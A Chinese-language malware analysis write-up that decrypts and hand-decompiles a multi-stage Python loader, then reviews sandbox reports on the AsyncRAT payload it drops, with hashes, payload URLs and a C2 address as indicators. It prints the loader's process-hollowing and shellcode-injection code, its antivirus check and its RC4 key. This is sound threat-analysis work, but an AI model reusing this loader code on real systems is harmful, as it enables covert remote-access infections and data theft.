總之把 zk.entrypoint 拆出來了 # stage 1 payload 一樣先提取出 stage 1 的 pyc ```python= import marshal, zlib, base64,dis,importlib code_object = marshal.loads(zlib.decompress(base64.b85decode(payload))) print(code_object) with open("zk_disassembly.txt", "w") as f: if isinstance(code_object, type((lambda: None).__code__)): disassembly = dis.code_info(code_object) f.write(disassembly) f.write("\nDisassembled bytecode:\n") dis.dis(code_object, file=f) else: f.write("Decoded content is not a code object.\n") f.write(str(code_object)) pyc_data = importlib._bootstrap_external._code_to_timestamp_pyc(code_object) print(pyc_data) with open('zk_output.pyc', 'wb') as f: f.write(pyc_data) ``` # stage 1 source code 然後使用 sup02.entrypoint 反編譯出的程式來提取出 stage 2 ```python= import os import json import base64 import sqlite3 import shutil import requests import glob import re import zipfile import io,dis import datetime import hmac import subprocess import zlib # from websocket import create_connection from base64 import b64decode from hashlib import sha1, pbkdf2_hmac from pathlib import Path from pyasn1.codec.der.decoder import decode from Crypto.Cipher import AES, DES3, PKCS1_OAEP from Crypto.PublicKey import RSA # from win32crypt import CryptUnprotectData # from ctypes import windll, byref, create_unicode_buffer, pointer, WINFUNCTYPE from ctypes.wintypes import DWORD, WCHAR, UINT def decompress(code_bytes: bytes) -> bytes: return zlib.decompress(code_bytes) def rc4(data, key): S = list(range(256)) j = 0 out = [] for i in range(256): j = (j + S[i] + key[i % len(key)]) % 256 S[i], S[j] = (S[j], S[i]) i = j = 0 for char in data: i = (i + 1) % 256 j = (j + S[i]) % 256 S[i], S[j] = (S[j], S[i]) out.append(char ^ S[(S[i] + S[j]) % 256]) return bytes(out) def aes_decrypt(data, key): nonce = data[:16] ciphertext = data[16:] cipher = AES.new(key, AES.MODE_EAX, nonce=nonce) return cipher.decrypt(ciphertext) def xor(data, key): return bytes([b ^ key[i % len(key)] for i, b in enumerate(data)]) def rsa_decrypt(data, private_key): rsa_cipher = PKCS1_OAEP.new(RSA.import_key(private_key)) return rsa_cipher.decrypt(data) def hybrid_decrypt(base85_encoded_data, rsa_private_key): compressed_data = base64.b85decode(base85_encoded_data) encrypted_data = decompress(compressed_data) rsa_encrypted_key = encrypted_data[:256] aes_encrypted = encrypted_data[256:] combined_key = rsa_decrypt(rsa_encrypted_key, rsa_private_key) rc4_key = combined_key[:16] xor_key = combined_key[16:32] aes_key = combined_key[32:48] xor_encrypted = aes_decrypt(aes_encrypted, aes_key) rc4_encrypted = xor(xor_encrypted, xor_key) decrypted_data = rc4(rc4_encrypted, rc4_key) return decrypted_data private_key = base64.b64decode('....') def runner(byte_code_data): import marshal import types code_object = marshal.loads(byte_code_data) # exceute_func = types.FunctionType(code_object, globals()) # exceute_func() with open("zk_disassembly.txt", "w") as f: if isinstance(code_object, type((lambda: None).__code__)): disassembly = dis.code_info(code_object) f.write(disassembly) f.write("\nDisassembled bytecode:\n") dis.dis(code_object, file=f) else: f.write("Decoded content is not a code object.\n") f.write(str(code_object)) import importlib pyc_data = importlib._bootstrap_external._code_to_timestamp_pyc(code_object) print(pyc_data) with open('zk_stage2.pyc', 'wb') as f: f.write(pyc_data) code = hybrid_decrypt('#stage 2 payload',private_key) runner(code) ``` # stage 2 source code 就能得到 stage 2 的 dis code 以及 pyc 了，稍微查看一下程式不多，大概不到 300 行，直接手工反編譯，大概做了四個小時 因為 payload 太長就不放了 ```python= import logging import platform import sys import ctypes from ctypes import FormatError,GetLastError,byref,c_size_t,create_string_buffer,sizeof,windll from ctypes.wintypes import LPVOID from ctypes.wintypes import wintypes as wt import time import pefile,time import shutil,base64,subprocess,os try: shutil.retree('__pycache__') except: pass from definitions import CONTEXT64, PROCESS_INFORMATION, STARTUPINFO, WOW64_CONTEXT from definitions import CONTEXT_FULL, CREATE_SUSPENDED, MEM_COMMIT, MEM_RESERVE, PAGE_EXECUTE_READWRITE, WOW64_CONTEXT_FULL # 看起來是很裸的 Local Shellcode Loader --- def rc4(data, key): S = list(range(256)) j = 0 out = [] for i in range(256): j = (j + S[i] + key[i % len(key)]) % 256 S[i], S[j] = (S[j], S[i]) i = j = 0 for char in data: i = (i + 1) % 256 j = (j + S[i]) % 256 S[i], S[j] = (S[j], S[i]) out.append(char ^ S[(S[i] + S[j]) % 256]) return bytes(out) def killprocessbyid(): try: return subprocess.run(f'taskkill /F /PID {pid}', creationflags=subprocess.CREATE_NO_WINDOW) except: return None # 抓到 shc_loader 這段是抄別人的 # https://github.com/brosck/Condor/blob/main/template/bypass.py # 主要用途為 bypass AV 注入 shellcode def shc_loader(base64_encrypted_shellcode): # --- 把 shellcode load 進來 然後用 rc4 算法 decrypt shc_encrypted = base64.b64decode(base64_encrypted_shellcode) shc = rc4(shc_encrypted, key) # --- # --- 先宣告一下 Win32 API kernel32 = ctypes.windll.kernel32 kernel32.VirtualAlloc.argtypes = (wt.LPVOID, wt.c_size_t, wt.DWORD, wt.DWORD) kernel32.VirtualAlloc.restype = wt.LPVOID kernel32.CreateRemoteThread.argtypes = ( wt.HANDLE, wt.LPVOID, wt.c_size_t, wt.LPVOID, wt.LPVOID, wt.DWORD, wt.LPVOID ) kernel32.CreateRemoteThread.restype = wt.HANDLE kernel32.RtlMoveMemory.argtypes = (wt.LPVOID, wt.LPVOID, wt.c_size_t) kernel32.RtlMoveMemory.restype = None kernel32.WaitForSingleObject.argtypes = (wt.HANDLE, wt.DWORD) kernel32.WaitForSingleObject.restype = wt.DWORD # --- try: # --- 開始 call Win32 API 做 local shellcode loader buf = shc memAddr = kernel32.VirtualAlloc(None, len(buf), 0x3000, 0x40) kernel32.RtlMoveMemory(memAddr, buf, len(buf)) th = kernel32.CreateRemoteThread( ctypes.c_int(0), ctypes.c_int(0), ctypes.c_void_p(memAddr), ctypes.c_int(0), ctypes.c_int(0), ctypes.pointer(ctypes(c_int(0))), ) kernel32.WaitForSingleObject(th, -1) # --- except Exception: return None # Local Shellcode Loader --- # --- decrypt shellcode + 建立等一下會用到的結構 base64_encrypted_shc='# base64_encrypted_shc payload' USING_64_BIT = platform.architecture()[0] == '64bit' TARGET_EXE='C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe' logger=logging.getLogger(__name__) logging.basicConfig( format='[%(asctime)s] %(levelname)s: %(message)s', level=logging.DEBUG, datefmt='%Y-%m-%d %H:%M:%S', ) for i in range(10): try: shutil.retree('__pycache__') except: pass payload_base64_encrypted='# payload_base64_encrypted payload' # 一隻 RAT exe payload_data_encrypted=base64.b64decode(payload_base64_encrypted) key=b'ditmethangwindowdefender' payload=rc4(payload_data_encrypted,key) startup_info = STARTUPINFO() startup_info.cb = sizeof(startup_info) process_info=PROCESS_INFORMATION() logger.info(f"Starting {TARGET_EXE} in suspended state") # --- # --- create process if windll.kernel32.CreateProcessA( None, create_string_buffer(bytes(TARGET_EXE,'encoding'=ascii)), None, None, False, CREATE_SUSPENDED, None, None, byref(startup_info), byref(process_info), ) == 0: logger.error(f"Error stating {TARGET_EXE}: {FormatError()}{GetLastError()}") sys.exit(1) logger.debug(f"PID: {process_info.dwProcessId}") pid=process_info.dwProcessID logger.info('Reading payload') pe_payload=pefile.PE(data=payload) payload_data=payload if pe_payload.PE_TYPE==pefile.OPTIONAL_HEADER_MAGIC_PE: logger.debug('is 32-bit') else: logger.debug('is 64-bit') logger.info('Getting thread context') context = CONTEXT64() if USING_64_BIT else WOW64_CONTEXT() context.ContextFlags = CONTEXT_FULL if USING_64_BIT else WOW64_CONTEXT_FULL if windll.kernel32.GetThreadContext(proess_info,hThread,byref(context))==0: logger.error(f'Error in GetThreadContext: {FormatError()}{GetLastError()}') killprocessbyid(pid) # --- # 準備蓋掉 Create 起來 Process 的 PE Header logger.info('Reading base address of process image') target_image_base=LPVOID() if windll.kernel32.ReadProcessMemory( process_info.hProcess, LPVOID((context.Rdx if USING_64_BIT else context.Ebx) + 2 * sizeof(c_size_t)), byref(target_image_base), sizeof(LPVOID), None )==0: logger.error(f'Error in ReadProcessMemory: {FormatError()}{GetLastError()}') killprocessbyid(pid) logger.debug(f"Base address of process: {hex(target_image_base.value)}") if target_image_base == pe_payload.OPTIONAL_HEADR.ImageBase: logger.info('Unmapping target executable from the process ') if windll.ntdll.NtUnmapViewOfSection(process_info.hProcess, target_image_base) == 0: logger.error(f'Error in NtUnmapViewOfSection: {FormatError()}{GetLastError()}') killprocessbyid(pid) return # --- # --- 看起來在嵌入 payload 的 PE header logger.info('Allocating memory in target process') if USING_64_BIT: LPVOID.restype = windll.kernel32.VirtualAllocEx allocated_address = windll.kernel32.VirtualAllocEx( process_info.hProcess, pe_payload.OPTIONAL_HEADER.ImageBase, pe_payload.OPTIONAL_HEADER.SizeOfImage, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE ) if allocated_address==0: logger.error(f'Error in VirtualAllocEx: {FormatError()}{GetLastError()}') killprocessbyid(pid) return logger.debug(f"Allocated memory at {hex(allocated_address)}") logger.debug(f"Writing payload headers to target process (to {hex(allocated_address)})") if windll.kernel32.WriteProcessMemory( process_info.hProcess, LPVOID(allocated_address), payload_data, pe_payload.OPTIONAL_HEADER.SizeOfHeaders, None )==0: logger.error(f'Error in WriteProcessMemory: {FormatError()}{GetLastError()}') killprocessbyid(pid) return # --- # 裸 Process Hollowing 流程 logger.info('Writing payload sections to target process') for section in pe_payload.sections: section_name=section.Name.decode('utf-8').strip('\x00') logger.info(f'Writing section {section_name} (to {hex(allocated_address+section.VirtualAddress)})') if windll.kernel32.WriteProcessMemory( process_info.hProcess, LPVOID(allocated_address+section.VirtualAddress), payload_data[section.PointerToRawData:], section.SizeOfRawData, None )==0: logger.error(f'Error in WriteProcessMemory: {FormatError()}{GetLastError()}') killprocessbyid(pid) return logger.info('Setting new entrypoint') if USING_64_BIT: context.Rcx=allcoated_address+pe_payload.OPTIONAL_HEADER.AddressOfEntryPoint() logger.debug(f"New entrypoint: {hex(context.Rcx)}") else: context.Eax=allcoated_address+pe_payload.OPTIONAL_HEADER.AddressOfEntryPoint() logger.debug(f"New entrypoint: {hex(context.Eax)}") logger.info('Writing base address of payload into the process') if windll.kernel32.WriteProcessMemory( process_info.hProcess, LPVOID((context.Rdx if USING_64_BIT else context.Ebx) + 2 * sizeof(c_size_t)), payload_data[pe_payload.OPTIONAL_HEADER.get_filed_absolute_offset("ImageBase"):], sizeof(LPVOID), None )==0: logger.error(f'Error in WriteProcessMemory: {FormatError()}{GetLastError()}') killprocessbyid(pid) return # --- logger.info('Setting modified context') if windll.kernel32.SetThreadContext(process_info.hThread,byref(context))==0: logger.error(f'Error in SetThreadContext: {FormatError()}{GetLastError()}') killprocessbyid(pid) return # --- execute the shellcode at exe entrypoint logger.info('Resuming context') if windll.kernel32.ResumeThread(process_info.hThread)==0: logger.error(f'Error in ResumeThread: {FormatError()}{GetLastError()}') killprocessbyid(pid) return # --- result = subprocess.run(['tasklist'], stdout=subprocess.PIPE, text=True, creationflags=subprocess.CREATE_NO_WINDOW) process_list=result.stdout if 'AvastUI.exe' in process_list or 'wsc_proxy.exe' in process_list: sys.exit() print('Delay for shcloader ... ') time.sleep(20) return shc_loader(base64_encrypted_shc),None ``` 不熟 windows API，但應該是做一些 process injection ~~**<p style="font-size: 50px;">等 RED 幫我翻譯</p>**~~ > 看完ㄌ, 看起來 shc_loader 只是在做 local shellcode loader, 下面比較特別的是看起來他把 create 的 exe 上半部整個嵌入成自己的 exe, 說是 Process Hollowing 但又不完全是, 不過確實是有趣ㄉ野外技術 @Red > >補 他甚至會偵測有沒有防毒在執行中, 如果有的話就退出 超好笑 會怕 > 感謝 Red 的光速翻譯 > 這份程式看起來是有兩個獨立的部分，process hollowing 以及 bypass AV 抓到使用的 source code，[HollowProcess/process-hollowing.py at main · joren485/HollowProcess](https://github.com/joren485/HollowProcess/blob/main/process-hollowing.py) ```python= import base64 payload_data_encrypted=base64.b64decode(payload_base64_encrypted) key=b'ditmethangwindowdefender' payload=rc4(payload_data_encrypted,key) print(payload) with open('payload.exe', 'wb') as f: f.write(payload) ``` 將 payload_base64_encrypted 解密後可以看到是一個 exe 檔案 `b'MZ\x90\x00\x03\x00\x00\x00\x04\` `payload.exe: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows` 最後找出這隻 Wmuxwilb.exe --- base64_encrypted_shc 也照上面的方式匯出，再使用 cyberchef 轉成 asm  找到此網站可以使用 AI 將 asm 轉換成 C ~~雖然結果沒什麼用~~ https://app.codeconvert.ai/code-converter  https://www.virustotal.com/gui/file/d2eef30bb17f05174b1bab290704c719a8766c3c7a990c4d65c006fb8090e41a ## 分析 可以找到 stage 2 的程式使用了兩個 github 專案，分別為 bypass AV 以及 process hollowing，且兩者似乎為獨立運作，不會影響彼此。 https://blog.csdn.net/qq_63701832/article/details/133968257 https://www.cnblogs.com/haidragon/p/16843483.html https://mp.weixin.qq.com/s/LkOmSNw7YgD7yfXkIrofHQ https://breachtactics.com/blog/pythonic-malware/ process hollowing 使用 [HollowProcess/process-hollowing.py at main · joren485/HollowProcess](https://github.com/joren485/HollowProcess/blob/main/process-hollowing.py) 因為 stage 2 中的 payload_base64_encrypted 本身就是 exe，所以會直接將 Wmuxwilb.exe 在記憶體內載入，且 Wmuxwilb.exe 是一隻 RAT bypass AV 使用 https://github.com/brosck/Condor/blob/main/template/bypass.py 會直接注入 shellcode # Wmuxwilb.exe [VirusTotal - File - 6dcf1468a9ee9d100ac91bfc0a66a302a55f67711f5f01e55b8eb2561f6a58ec](https://www.virustotal.com/gui/file/6dcf1468a9ee9d100ac91bfc0a66a302a55f67711f5f01e55b8eb2561f6a58ec) [Malware analysis payload.exe Malicious activity | ANY.RUN - Malware Sandbox Online](https://any.run/report/6dcf1468a9ee9d100ac91bfc0a66a302a55f67711f5f01e55b8eb2561f6a58ec/97000e1a-5d69-41bf-b874-517b1be99ee6?_gl=1*b0d12j*_ga*MTAzNDgwNjIwMC4xNzM3MzY5NDE0*_ga_53KB74YDZR*MTczNzM2OTQxMy4xLjEuMTczNzM3MjI5Mi4wLjAuNjgwNzI1NzA4*_gcl_au*NDc5NDI5MTg4LjE3MzczNzE4MDU.*FPAU*NDc5NDI5MTg4LjE3MzczNzE4MDU.) [6dcf1468a9ee9d100ac91bfc0a66a302a55f67711f5f01e55b8eb2561f6a58ec | Triage](https://tria.ge/250120-mltjhsvlex/behavioral1) https://www.joesandbox.com/analysis/1599284/0/executive ## VirusTotal 38/72 Popular threat label: trojan.lazy/msil Threat categories: trojan/dropper Family labels: lazy/msil MD5: 9a2785ed0bfca61e66d1ca25d9b87891 SHA-1: 3cdaefdb8b864365c0eb5a39bfccfb599b0b6376 SHA-256: 6dcf1468a9ee9d100ac91bfc0a66a302a55f67711f5f01e55b8eb2561f6a58ec Library: .NET (v4.0.30319)   在 IP Traffic 可以看到 `TCP 38.180.225.150:56001` 連線，但無法找到有判斷為惡意的資訊 [VirusTotal - IP address - 20.99.186.246](https://www.virustotal.com/gui/ip-address/20.99.186.246) 被標記為 APT27 所使用的 IP 在 Memory Pattern Urls 可以看到以下網址: 1. https://github.com/DFfe9ewf/test3/raw/refs/heads/main/WebDriver.dll 2. https://github.com/DFfe9ewf/test3/raw/refs/heads/main/chromedriver.exe 3. https://github.com/DFfe9ewf/test3/raw/refs/heads/main/msedgedriver.exe 4. https://stackoverflow.com/q/11564914/23354; 5. https://stackoverflow.com/q/14436606/23354 6. https://stackoverflow.com/q/2152978/23354rCannot  似乎有執行 IsDebuggerPresent，進行簡單的 anti-debug 值得注意的是看起來有搜尋防毒軟體 `IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct` 使用 DFfe9ewf 搜尋，可以找到幾篇 sandbox report 1. [Automated Malware Analysis - Joe Sandbox Cloud Basic](https://www.joesandbox.com/analysis/1549304) - 連線到 162.230.48.189 - https://github.com/mgravell/protobuf-net - 同樣出現的 URL - https://stackoverflow.com/q/14436606/23354 - https://github.com/DFfe9ewf/test3/.... - http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name - https://stackoverflow.com/q/2152978/23354rCannot - https://stackoverflow.com/q/11564914/23354; - https://stackoverflow.com/q/2152978/23354 - Dropped file - C:\Users\user\AppData\Local\Temp\k9RDtLDQqgan.bat - sha1: 88E812D9C5C66D063998D3C1FA62DBE7940D6993 - C:\Users\user\AppData\Roaming\CanRead.exe - sha1: A25DFF3C86AA7FEFDDB8B9173B64F5F87F398EA3 - C:\Users\user\AppData\Roaming\IDEKCRY.exe - sha1: A25DFF3C86AA7FEFDDB8B9173B64F5F87F398EA3 3. [Automated Malware Analysis - Joe Sandbox Cloud Basic](https://www.joesandbox.com/analysis/1550698) - 連線到 162.230.48.189 - http://162.230.48.189:56007/ready - https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103 - https://github.com/mgravell/protobuf-netJ - 同樣出現的 URL - https://stackoverflow.com/q/14436606/23354 - https://github.com/DFfe9ewf/test3/.... - http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name - https://stackoverflow.com/q/2152978/23354rCannot - https://stackoverflow.com/q/11564914/23354; - https://stackoverflow.com/q/2152978/23354 - Dropped file - C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\System.vbs - sha1: 2074D1B21484CC8DA2D27C6BCFB05311C4EDC812 - C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TypeId.vbs - sha1: 80F6C546C47594600FA09415F4EF69E7B2D19562 - C:\Users\user\AppData\Roaming\System.vbs - sha1: 2074D1B21484CC8DA2D27C6BCFB05311C4EDC812 - C:\Users\user\AppData\Roaming\TypeId.exe - sha1: E0E338A9ABC098C267B8E45BEFC54816F7358E90 - C:\Users\user\AppData\Roaming\worn.vbs - sha1: 2074D1B21484CC8DA2D27C6BCFB05311C4EDC812 5. [Report - raw.githubusercontent.com/DFfe9ewf/test3/refs/heads/main/chromedriver.exe](https://urlquery.net/report/7d48cf66-e8b4-4ccd-a34e-ec9a8f1be831) - YARAhub by abuse.ch | malware | pe_detect_tls_callbacks 7. [Report - raw.githubusercontent.com/DFfe9ewf/test3/refs/heads/main/msedgedriver.exe](https://urlquery.net/report/9d412421-85bb-455b-a952-640702c36c9a) - YARAhub by abuse.ch | malware | pe_detect_tls_callbacks ## ANY.RUN   在這也一樣判斷出此IP會進行 Domain Observed Used for C2 Detected: ET MALWARE Generic AsyncRAT Style SSL Cert 以及 Malware Command and Control Activity Detected: REMOTE [ANY.RUN] AsyncRAT Successful Connection  並嘗試進行資料偷取，包含如下檔案 1. C:\Users\admin\AppData\Local\Microsoft\Edge\User Data\FirstPartySetsPreloaded 2. C:\Users\admin\AppData\Local\Microsoft\Edge\User Data\FirstPartySetsPreloaded\2024.6.5.0 3. C:\Users\admin\AppData\Local\Microsoft\Edge\User Data\FirstPartySetsPreloaded\2024.6.5.0\_metadata 4. C:\Users\admin\AppData\Local\Microsoft\Edge\User Data\OriginTrials\0.0.1.4 5. C:\Users\admin\AppData\Local\Microsoft\Edge\User Data\GrShaderCache 6. C:\Users\admin\AppData\Local\Microsoft\Edge\User Data\GraphiteDawnCache 7. C:\Users\admin\AppData\Local\Microsoft\Edge\User Data\GrShaderCache 8. C:\Users\admin\AppData\Local\Microsoft\Edge\User Data\FirstPartySetsPreloaded\2024.6.5.0 9. C:\Users\admin\AppData\Local\Microsoft\Edge\User Data\hyphen-data 10. C:\Users\admin\AppData\Local\Microsoft\Edge\User Data\PKIMetadata\13.0.0.0 似乎偵測到 [PUREHVNC](https://www.freebuf.com/news/408455.html) has been detected (YARA)，但沒有完整資料 [ASYNCRAT](https://github.com/NYAN-x-CAT/AsyncRAT-C-Sharp) has been detected (SURICATA)  ## Tria.ge 特徵: 1. Reads user/profile data of web browsers 2. System Location Discovery: System Language Discovery 3. Suspicious use of AdjustPrivilegeToken 查看封包可以看到對 38.180.225.150:56001 的連線使用 tls 加密  # shellcode 存成 bin 檔案並使用 ida 打開   看到 dll 字串 # IoC C2: 38.180.225.150:56001